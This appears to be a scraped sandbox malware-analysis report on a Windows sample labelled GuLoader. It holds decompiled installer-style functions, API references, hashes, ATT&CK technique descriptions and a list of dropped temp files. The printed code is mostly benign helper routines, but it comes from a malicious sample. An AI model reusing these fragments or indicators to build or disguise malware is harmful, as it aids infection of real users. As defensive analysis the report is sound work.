API String ID: 2102729457-0
Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236f4 = _t16;
							E00404E9E();
						}
						L11:
						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E1E(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044AF(0x413);
				return 0;
			}

0x004054e1
0x004054eb
0x00405507
0x00405529
0x0040552c
0x00405532
0x0040553c
0x0040553d
0x0040553f
0x00405545
0x00405545
0x0040554f
0x00000000
0x0040555d
0x00405514
0x0040554c
0x0040554c
0x00000000
0x0040554c
0x00405520
0x00405522
0x00000000
0x00405522
0x004054f1
0x00000000
0x00000000
0x004054f8
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040550C
CallWindowProcW.USER32(?,?,?,?), ref: 0040555D

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Strings

, xrefs: 004054ED

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A

Uniqueness

Uniqueness Score: -1.00%

Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x004063e3
0x004063e5
0x004063fd
0x00406402
0x00406407
0x00406445
0x00406445
0x00406409
0x0040641b
0x00406426
0x0040642c
0x00406437
0x00000000
0x00000000
0x00406437
0x0040644b

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040663C,80000002), ref: 0040641B
RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll), ref: 00406426

Strings

Call, xrefs: 004063DC

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B21() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216cc;
				_t3 = E00403B06(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216cc =  *0x4216cc & 0x00000000;
				return _t3;
			}

0x00403b22
0x00403b2a
0x00403b31
0x00403b34
0x00403b34
0x00403b36
0x00403b3b
0x00403b42
0x00403b48
0x00403b4c
0x00403b4d
0x00403b55

APIs

FreeLibrary.KERNEL32(?,76CDFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
GlobalFree.KERNEL32 ref: 00403B42

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405f6c
0x00405f6e
0x00405f71
0x00405f9d
0x00405f76
0x00405f7f
0x00405f84
0x00405f8f
0x00405f92
0x00405fae
0x00405f94
0x00405f9b
0x00000000
0x00405f9b
0x00405fa7
0x00405fab
0x00405fab
0x00405fa5
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F84
CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3GJ6S3Kwnb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Airplane_6.bmp

C:\Users\user\AppData\Local\Temp\Bluetooth Suite help_SL.chm

C:\Users\user\AppData\Local\Temp\DiFxAPI.dll

C:\Users\user\AppData\Local\Temp\HPPrintScanDoctorDeploymentMgr.exe

C:\Users\user\AppData\Local\Temp\NativeAdapter.dll

C:\Users\user\AppData\Local\Temp\REINSPECTED.lnk

C:\Users\user\AppData\Local\Temp\Velsespladser5.tmp

C:\Users\user\AppData\Local\Temp\igoAudSessionMonitor.dll

C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Windows Analysis Report
3GJ6S3Kwnb

Function 004034F7 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450
stringfilecomCOMMON

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00404954 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 275
stringCOMMON

Function 73331BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 73331817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Function 00401F12 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
COMMON

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 0040563C Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00402C05 Relevance: 3.0, APIs: 2, Instructions: 21
windowCOMMON

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON